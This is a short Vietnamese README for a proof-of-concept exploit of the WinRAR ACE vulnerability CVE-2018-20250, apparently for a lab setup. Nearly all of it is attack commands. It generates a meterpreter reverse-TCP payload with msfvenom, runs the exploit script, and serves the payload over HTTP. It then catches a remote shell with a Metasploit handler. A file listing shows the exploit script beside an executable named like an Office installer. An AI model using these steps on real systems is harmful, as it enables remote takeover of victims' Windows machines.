## Setup
- Video demo: https://youtu.be/5tuWsi1tGS0
- VirtualBox Machine: https://j2c.cc/virtualbox-machine
- Winrar 5.5 32bit: https://j2c.cc/winrar-550-32bit
## Các bước tiến hành
- Kali:
```
ip a
msfvenom -p windows/meterpreter/reverse_tcp lport=1234 lhost=10.0.0.199 -f exe > shell.exe
```
- Windows:
```
git clone https://github.com/giatrung2012/CVE-2018-20250
py exp.py
```
- Kali:
```
python3 -m http.server
```
- Windows:
10.0.0.199:8000
- Kali:
```
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 1234
set lhost 10.0.0.199
exploit -j
sessions
sessions 1
sysinfo
shell
```
[4.0K] /data/pocs/987a912108338a9899e15803b61f7b70b2453c9b
├── [ 45] account.txt
├── [155K] acefile.py
├── [4.0K] docs
│ └── [1.7M] Kiemthuxamnhap (1).docx
├── [4.0K] exp.py
├── [8.0M] OfficeSetup.exe
├── [ 632] README.md
└── [ 72K] shell.exe
1 directory, 7 files